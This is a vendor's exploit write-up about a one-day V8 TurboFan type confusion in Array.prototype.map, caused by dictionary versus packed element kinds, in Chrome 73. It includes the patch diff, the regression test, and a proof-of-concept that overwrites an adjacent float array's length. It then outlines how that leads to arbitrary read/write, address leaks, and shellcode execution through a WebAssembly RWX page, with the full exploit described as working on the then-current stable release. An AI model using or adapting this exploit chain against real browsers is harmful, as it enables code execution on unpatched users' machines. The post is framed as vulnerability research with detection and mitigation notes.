A window of opportunity: exploiting a Chrome 1day vulnerability

This post explores the possibility of developing a working exploit for a vulnerability already patched in the v8 source tree before the fix makes it into a stable Chrome release.

Chrome Release Schedule

Chrome has a relatively tight release cycle of pushing a new stable version every 6 weeks with stable refreshes in between if warranted by critical issues. As a result of its open-source development model, while security fixes are immediately visible in the source tree, they need time to be tested in the non-stable release channels of Chrome before they can be pushed out via the auto-update mechanism as part of a stable release to most of the user-base.

In effect, there’s a window of opportunity for attackers ranging from a couple days to weeks in which the vulnerability details are practically public yet most of the users are vulnerable and cannot obtain a patch.

Open Source Patch Analysis

Looking through the git log of v8 can be an overwhelming experience. There was a change however that caught my attention immediately. The fix has the following commit message:

[TurboFan] Array.prototype.map wrong ElementsKind for output array.

The associated chromium issue tracker entry is restricted and likely to remain so for months. However, it has all the ingredients that might allow an attacker to produce an exploit quickly, which is the ultimate goal here: TurboFan is the optimizing JIT compiler of v8, which has become a hot target recently. Array vulnerabilities are always promising and this one hints at a type confusion between element kinds, which can be relatively straightforward to exploit. The patch also includes a regression test that effectively triggers the vulnerability, which can also help shorten exploit development time.

The only modified method is JSCallReducer::ReduceArrayMap in src/compiler/js-call-reducer.cc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Reduction JSCallReducer::ReduceArrayMap(Node* node,
const SharedFunctionInfoRef& shared) {
Node* original_length = effect = graph()->NewNode(
simplified()->LoadField(AccessBuilder::ForJSArrayLength(kind)), receiver,
effect, control);

+ // If the array length >= kMaxFastArrayLength, then CreateArray
+ // will create a dictionary. We should deopt in this case, and make sure
+ // not to attempt inlining again.
+ original_length = effect = graph()->NewNode(
+ simplified()->CheckBounds(p.feedback()), original_length,
+ jsgraph()->Constant(JSArray::kMaxFastArrayLength), effect, control);
+
// Even though {JSCreateArray} is not marked as {kNoThrow}, we can elide the
// exceptional projections because it cannot throw with the given parameters.
Node* a = control = effect = graph()->NewNode(
javascript()->CreateArray(1, MaybeHandle()),
array_constructor, array_constructor, original_length, context,
outer_frame_state, effect, control);

JSCallReducer runs during the InliningPhase of TurboFan, its ReduceArrayMap method attempts to replace calls to Array.prototype.map with inlined code. The comments are descriptive, the added lines insert a check to verify that the length of the array is below kMaxFastArrayLength (which is 32 MiB). This length is passed to CreateArray, which returns a new array.

The v8 engine has different optimizations for the storage of arrays that have specific characteristics. For example, PACKED_DOUBLE_ELEMENTS is the elements kind used for arrays that only have double elements and no holes. These are stored as a contiguous array in memory and allow for efficient code generation for operations like map. Confusion between the different element kinds is a common source of security vulnerabilities.

So why is it a problem if the length is above kMaxFastArrayLength? Because CreateArray will return an array with a dictionary element kind for such lengths. Dictionaries are used for large and sparse arrays and are basically hash tables. However, by feeding it the right type feedback, TurboFan will try to generate optimized code for contiguous arrays. This is a common property of many JIT compiler vulnerabilities: the compiler makes an optimization based on type feedback but a corner case allows an attacker to break the assumption during runtime of the generated code.

Since the dictionary and contiguous element kinds have vastly different backing storage mechanisms, this allows for memory corruption. In effect, the output array will be a small (considering its size in memory, not its length property) dictionary that will be accessed by the optimized code as if it was a large (again, considering its size in memory) contiguous region.

Looking at the regression test included in the fix, it feeds the mapping function with feedback for an array with contiguous storage (Lines 6-13), then after it’s been optimized by Turbofan, invokes it with an array that is large enough so that the output of map will end up with dictionary element kind.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
function mapping(a) {
return a.map(v => v);
}
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1,0);
a.push(2);
a.length += 500;
// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
mapping(a);

Exploitation

Since the map operation will write ~32 million elements out-of-bounds to the output array, the regression test essentially triggers a wild memcpy. To make exploitation possible, the loop of map needs to be stopped. This is possible by providing a callback function that raises an exception after the desired number of iterations. Another issue is that it overwrites everything linearly without skips, while ideally we would like to only selectively overwrite a single value at a specific offset, e.g. the length property of an adjacent array. Reading through the documentation of Array.prototype.map, the following can be seen:

map calls a provided callback function once for each element in an array, in order, and constructs a new array from the results. callback is invoked only for indexes of the array which have assigned values, including undefined. It is not called for missing elements of the array (that is, indexes that have never been set, which have been deleted or which have never been assigned a value).

So unset elements (holes) are skipped and map writes nothing to the output array for those indexes. The PoC code below utilizes both of these behaviors to overwrite the length of an array adjacent to the map output array.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
// This call ensures that TurboFan won't inline array constructors.
Array(2**30);

// we are aiming for the following object layout
// [output of Array.map][packed float array]
// First the length of the packed float array is corrupted via the original vulnerability,

// offset of the length field of the float array from the map output
const float_array_len_offset = 23;

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
var float_array;

function mapping(a) {
function cb(elem, idx) {
if (idx == 0) {
float_array = [0.1, 0.2];
}
if (idx > float_array_len_offset) {
// minimize the corruption for stability
throw "stop";
}
return idx;
}

return a.map(cb);
}
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1, float_array_len_offset, float_array_len_offset+1);
a.fill(1, float_array_len_offset+2);

a.push(2);
a.length += 500;

// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
cnt = 1;
try {
mapping(a);
} catch(e) {
console.log(float_array.length);
console.log(float_array[3]);
}

At this point, we have a float array that can be used for out-of-bounds reads and writes. The exploit aims for the following object layout on the heap to capitalize on this:

[output of Array.map][packed float array][typed array][obj]

The corrupted float array is used to modify the backing store pointer of the typed array, thus achieving arbitrary read/write. obj at the end is used to leak the address of arbitrary objects by setting them as inline properties on it then reading their address through the float array. From then on, the exploit follows the steps described in my previous post to achieve arbitrary code execution by creating an RWX page via WebAssembly, traversing the JSFunction object hierarchy to find it in memory and place the shellcode there.

The full exploit code which works on the latest stable version (v73.0.3683.86 as of 3rd April 2019) can be found on our github and it can be seen in action below. It’s quite reliable and could also be integrated with a Site-Isolation based brute-forcer, as discussed in our previous blog posts. Note that a sandbox escape would be needed for a complete chain.

Detection

The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.

Mitigation

Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.

Conclusion

The idea of developing exploits for 1day vulnerabilities before the fix becomes available isn’t new and the issue is definitely not unique to Chrome. Even though exploits developed for such vulnerabilities have a short lifespan, malicious actors may take advantage of them, as they avoid the risk of burning 0days. Keeping up-to-date on patches/updates from a vendor or relying on public advisories isn’t good enough. One needs to dig deep into a patch to know if it applies to an exploitable security vulnerability.

The timely analysis of these 1day vulnerabilities is one of the key differentiators of our Exodus nDay Subscription. It enables our customers to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.